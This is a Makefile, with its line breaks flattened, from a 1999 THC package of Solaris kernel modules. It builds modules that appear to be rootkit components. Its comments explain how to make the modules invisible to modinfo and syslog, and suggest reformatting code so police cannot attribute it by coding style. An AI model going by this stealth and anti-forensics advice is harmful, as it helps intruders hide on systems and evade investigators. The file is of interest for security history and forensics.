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# # Solaris Loadable Kernel Modules for Solaris 2.7 (sparc/x86)# (c) 1999 by Plasmoid/THC <plasmoid@pimmel.com># [THC] The Hacker's Choice - http://www.infowar.co.uk/thc## Customize the CC and LD setting if your c compiler is not in your path.# If you are not using Gnu CC be sure to set the right CFLAGS and COPTS.CC=gccLD=ldCFLAGS=-O2COPTS=-g -D_KERNEL -DSVR4 -DSOL2 -DDEBUG# Script-Kiddies should uncomment the line below in order to hide the sitf# and anm module. If DEBUG is not defined the modules won't write into syslogd# and will be invisible to "modinfo". Don't do any illegal things!# COPTS=-D_KERNEL -DSVR4 -DSOL2 #(!) Developers: $PACKAGE is the name of your package, usefull with the target # "make package". Currently: slkm-1.0 (Solaris Loadable Kernel Modules v1.0)PACKAGE=slkm-1.0# Check if the libC archive is inside your /lib directory otherwise change# LIBCARCHIVE below. ##(!) Developers: If you have the Solaris 2.7 source code rip functions like# memmove, strstr... from the libC source and include those directly into# your module instead of extracing objects from the libC archive.LIBCARCHIVE=/lib/libc.aLIBCOBJECTS=memmove.o memcpy.o strstr.oMODULES=flkm anm sitf0.1 sitf0.2# (!) Developers: You won't believe it, but it's quite a good idea to sync the# file system just in case your module won't work and the system will# crash. all: $(MODULES) sync# (!) Developers: Use this target to package the sources in a nice handy# tar-ball, be sure to set the $PACKAGE variable and rename the directory# including the source modules to $PACKAGE. package: clean rm -rf ../$(PACKAGE).tar.gz mkdir $(PACKAGE) cp *.c Makefile $(PACKAGE) tar -cvf $(PACKAGE).tar $(PACKAGE) gzip $(PACKAGE).tar mv $(PACKAGE).tar.gz .. rm -rf $(PACKAGE) flkm: flkm.o $(LD) -o $@ -r flkm.o# (!) Developers: If you are going to develop your own modules, make backups# on a different system using nfs or something similar.# cp flkm.c /net/zebster/tmp/flkm.baksitf0.1: sitf0.1.o $(LD) -o $@ -r sitf0.1.o $(LIBCOBJECTS)# cp sitf0.1.c /net/zebster/tmp/sitf0.1.baksitf0.2: sitf0.2.o $(LD) -o $@ -r sitf0.2.o $(LIBCOBJECTS)# cp sitf0.2.c /net/zebster/tmp/sitf0.2.bakanm: anm.o $(LD) -o $@ -r anm.o $(LIBCOBJECTS)# cp anm.c /net/zebster/tmp/anm.baksitf0.1.o: sitf0.1.c $(CC) $(COPTS) $(CFLAGS) -c sitf0.1.c ar -x $(LIBCARCHIVE) $(LIBCOBJECTS)sitf0.2.o: sitf0.2.c $(CC) $(COPTS) $(CFLAGS) -c sitf0.2.c ar -x $(LIBCARCHIVE) $(LIBCOBJECTS)flkm.o: flkm.c $(CC) $(COPTS) $(CFLAGS) -c flkm.canm.o: anm.c $(CC) $(COPTS) $(CFLAGS) -c anm.c ar -x $(LIBCARCHIVE) $(LIBCOBJECTS)clean: rm -rf $(MODULES)# It is not a bad idea to indent your source, as far as I know there haven# been guys busted because the coppers analyzed their coding style, especially# spaces, brackets and tabs. But there are only a few Solaris systems, I saw,# having an installed indent beside mine and Wilkins'. indent -kr *.c rm -rf *.o *~ core
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